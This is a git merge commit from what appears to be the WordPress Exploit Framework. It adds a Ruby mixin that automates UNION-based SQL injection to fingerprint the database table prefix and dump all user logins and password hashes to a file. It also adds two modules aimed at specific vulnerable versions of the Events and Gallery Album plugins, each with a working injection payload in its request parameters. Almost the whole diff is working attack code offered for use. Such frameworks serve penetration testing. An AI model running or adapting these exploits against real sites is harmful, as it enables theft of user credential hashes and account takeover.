Merge branch 'hashdump_mixin' into development

Author: rastating

lib/wpxf/core.rb

@@ -75,5 +75,6 @@ def self.change_stdout_sync(enabled)
 require 'wpxf/wordpress/shell_upload'
 require 'wpxf/wordpress/file_download'
 require 'wpxf/wordpress/comments'
+require 'wpxf/wordpress/hash_dump'
 
 require 'wpxf/core/module'

lib/wpxf/utility/text.rb

@@ -8,9 +8,12 @@ module Utility
     module Text
       # Generate a random numeric string.
       # @param length [Integer] the number of characters to include.
+      # @param allow_leading_zero [Boolean] if set to true, will allow a number starting with zero.
       # @return [String] a random numeric string.
-      def self.rand_numeric(length)
-        Array.new(length) { [*'0'..'9'].sample }.join
+      def self.rand_numeric(length, allow_leading_zero = false)
+        value = Array.new(length) { [*'0'..'9'].sample }.join
+        value[0] = [*'1'..'9'].sample unless allow_leading_zero
+        value
       end
 
       # Generate a random alphanumeric string.

lib/wpxf/wordpress/hash_dump.rb

@@ -0,0 +1,239 @@
+# frozen_string_literal: true
+
+# Provides reusable functionality for hash dump modules.
+module Wpxf::WordPress::HashDump
+  include Wpxf
+
+  def initialize
+    super
+
+    @info[:desc] = 'This module exploits an SQL injetion vulnerability to generate a dump of all the user hashes in the database.'
+
+    register_options([
+      StringOption.new(
+        name: 'export_path',
+        desc: 'The file to save the hash dump to',
+        required: false
+      )
+    ])
+  end
+
+  # @return [String] the path to export the hash dump to.
+  def export_path
+    return nil if normalized_option_value('export_path').nil?
+    File.expand_path normalized_option_value('export_path')
+  end
+
+  # @return [Boolean] returns true if only one row of the SQL query will be displayed per request.
+  def reveals_one_row_per_request
+    false
+  end
+
+  # @return [String] a unique SQL select statement that can be used to extract the hashes.
+  def hashdump_sql_statement
+    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+    cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,user_login,0x3a,user_pass,0x3a,#{eof_token})"
+
+    query = "select #{cols.join(',')} from #{table_prefix}users"
+    return query unless reveals_one_row_per_request
+
+    "#{query} limit #{current_row},1"
+  end
+
+  # @return [String] a unique SEL select statement that can be used to fingerprint the database prefix.
+  def hashdump_prefix_fingerprint_statement
+    cols = Array.new(hashdump_number_of_cols) { |_i| '0' }
+    cols[hashdump_visible_field_index] = "concat(#{bof_token},0x3a,table_name,0x3a,#{eof_token})"
+
+    query = "select #{cols.join(',')} from information_schema.tables where table_schema = database()"
+    return query unless reveals_one_row_per_request
+
+    "#{query} limit #{current_row},1"
+  end
+
+  # @return [Integer] the zero-based index of the column which is visible in the response output.
+  def hashdump_visible_field_index
+    0
+  end
+
+  # @return [Integer] the number of columns in the vulnerable SQL statement.
+  def hashdump_number_of_cols
+    1
+  end
+
+  # @return [Symbol] the HTTP method to use when requesting the hash dump.
+  def hashdump_request_method
+    :get
+  end
+
+  # @return [Hash] the parameters to be used when requesting the hash dump.
+  def hashdump_request_params
+    nil
+  end
+
+  # @return [Hash, String] the body to be used when requesting the hash dump.
+  def hashdump_request_body
+    nil
+  end
+
+  # @return [String] the URL of the vulnerable page.
+  def vulnerable_url
+    nil
+  end
+
+  # @return [String] the table prefix determined by the module.
+  def table_prefix
+    @table_prefix
+  end
+
+  # Run the module.
+  # @return [Boolean] true if successful.
+  def run
+    return false unless super
+
+    generate_id_tokens
+
+    @current_row = 0
+    emit_info 'Determining database prefix...'
+    return false unless determine_prefix
+    emit_success "Found prefix: #{table_prefix}", true
+
+    @current_row = 0
+    emit_info 'Dumping user hashes...'
+    hashes = dump_and_parse_hashes
+    output_hashdump_table(hashes)
+
+    export_hashes(hashes) if export_path
+    true
+  end
+
+  private
+
+  def bof_token
+    @bof_token
+  end
+
+  def eof_token
+    @eof_token
+  end
+
+  def current_row
+    @current_row
+  end
+
+  def execute_hashdump_request
+    res = execute_request(
+      method: hashdump_request_method,
+      url: vulnerable_url,
+      params: hashdump_request_params,
+      body: hashdump_request_body,
+      cookie: session_cookie
+    )
+
+    return false unless res&.code == 200
+    res
+  end
+
+  def dump_and_parse_hashes
+    unless reveals_one_row_per_request
+      res = execute_hashdump_request
+      return parse_hashdump_body(res.body)
+    end
+
+    eof = false
+    hashes = []
+
+    until eof
+      res = execute_hashdump_request
+      break unless res.body.match?(/#{bof_token}\:(.*?)\:#{eof_token}/)
+
+      hash = parse_hashdump_body(res.body)
+      hashes.push([hash[0][0], hash[0][1]]) if hash
+      @current_row += 1
+    end
+
+    hashes
+  end
+
+  def build_prefix_request_body
+    body = hashdump_request_body
+    unless body.nil?
+      if body.is_a?(Hash)
+        body.each do |k, v|
+          body[k] = v.gsub(hashdump_sql_statement, hashdump_prefix_fingerprint_statement)
+        end
+      else
+        body.gsub!(hashdump_sql_statement, hashdump_prefix_fingerprint_statement)
+      end
+    end
+
+    body
+  end
+
+  def build_prefix_request_params
+    params = hashdump_request_params
+
+    params&.each do |k, v|
+      params[k] = v.gsub(hashdump_sql_statement, hashdump_prefix_fingerprint_statement)
+    end
+
+    params
+  end
+
+  def determine_prefix
+    body = build_prefix_request_body
+    params = build_prefix_request_params
+
+    res = execute_request(
+      method: hashdump_request_method,
+      url: vulnerable_url,
+      params: params,
+      body: body,
+      cookie: session_cookie
+    )
+
+    return nil unless res&.code == 200
+
+    # If the prefix is found, regardless of the row mode, return it.
+    @table_prefix = res.body[/#{bof_token}\:([^:]+?)usermeta\:#{eof_token}/, 1]
+    return @table_prefix if @table_prefix
+    return nil unless reveals_one_row_per_request
+
+    # If the bof and eof tokens weren't found at all, there are no more rows available.
+    return nil unless res.body.match?(/#{bof_token}\:(.*?)\:#{eof_token}/)
+
+    # If the tokens were found, then we can try to query another row.
+    @current_row += 1
+    determine_prefix
+  end
+
+  def output_hashdump_table(hashes)
+    rows = []
+    rows.push(user: 'Username', hash: 'Hash')
+    hashes.each do |pair|
+      rows.push(user: pair[0], hash: pair[1])
+    end
+
+    emit_table rows
+  end
+
+  def export_hashes(hashes)
+    open(export_path, 'w') do |f|
+      hashes.each do |pair|
+        f.puts "#{pair[0]}:#{pair[1]}"
+      end
+    end
+
+    emit_success "Saved dump to #{export_path}"
+  end
+
+  def parse_hashdump_body(body)
+    pattern = /#{bof_token}\:(.+?)\:(.+?)\:#{eof_token}/
+    body.scan(pattern)
+  end
+
+  def generate_id_tokens
+    @eof_token = Utility::Text.rand_numeric(10)
+    @bof_token = Utility::Text.rand_numeric(10)
+  end
+end

modules/auxiliary/events_hash_dump.rb

@@ -0,0 +1,59 @@
+# frozen_string_literal: true
+
+class Wpxf::Auxiliary::EventsHashDump < Wpxf::Module
+  include Wpxf::WordPress::HashDump
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Events <= 2.3.4 Authenticated Hash Dump',
+      desc: %(
+        Events <= 2.3.4 contains an SQL injection vulnerability
+        which can be leveraged by all registered users with the permission
+        to manage events via the plugin. This module utilises this vulnerability
+        to dump the hashed passwords of all users in the database.
+      ),
+      author: [
+        'Lenon Leite',                     # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8954'],
+        ['URL', 'http://lenonleite.com.br/en/blog/2017/11/03/wp-events-2-3-4-wordpress-plugin-sql-injetcion/']
+      ],
+      date: 'Nov 03 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('wp-events', '2.3.5')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def reveals_one_row_per_request
+    true
+  end
+
+  def hashdump_request_params
+    {
+      'page' => 'wp-events-edit',
+      'edit_event' => "-#{Utility::Text.rand_numeric(3)} UNION #{hashdump_sql_statement} #"
+    }
+  end
+
+  def hashdump_visible_field_index
+    1
+  end
+
+  def hashdump_number_of_cols
+    14
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+end

modules/auxiliary/gallery_album_hash_dump.rb

@@ -0,0 +1,61 @@
+# frozen_string_literal: true
+
+class Wpxf::Auxiliary::GalleryAlbumHashDump < Wpxf::Module
+  include Wpxf::WordPress::HashDump
+
+  def initialize
+    super
+
+    update_info(
+      name: 'Responsive Image Gallery, Gallery Album <= 1.2.0 Authenticated Hash Dump',
+      desc: %(
+        Responsive Image Gallery, Gallery Album <= 1.2.0 contains an SQL injection vulnerability
+        which can be leveraged by all registered users with the permission
+        to manage the plugin settings. This module utilises this vulnerability
+        to dump the hashed passwords of all users in the database.
+      ),
+      author: [
+        'Manuel Garcia Cardenas',          # Disclosure
+        'Rob Carr <rob[at]rastating.com>'  # WPXF module
+      ],
+      references: [
+        ['WPVDB', '8907'],
+        ['CVE', '2017-14125'],
+        ['URL', 'http://seclists.org/fulldisclosure/2017/Sep/55']
+      ],
+      date: 'Sep 22 2017'
+    )
+  end
+
+  def check
+    check_plugin_version_from_readme('gallery-album', '1.2.1')
+  end
+
+  def requires_authentication
+    true
+  end
+
+  def reveals_one_row_per_request
+    true
+  end
+
+  def hashdump_request_params
+    {
+      'page' => 'wpdevart_gallery_themes',
+      'task' => 'add_edit_theme',
+      'id' => "-#{Utility::Text.rand_numeric(3)} UNION #{hashdump_sql_statement}--"
+    }
+  end
+
+  def hashdump_visible_field_index
+    1
+  end
+
+  def hashdump_number_of_cols
+    4
+  end
+
+  def vulnerable_url
+    normalize_uri(wordpress_url_admin, 'admin.php')
+  end
+end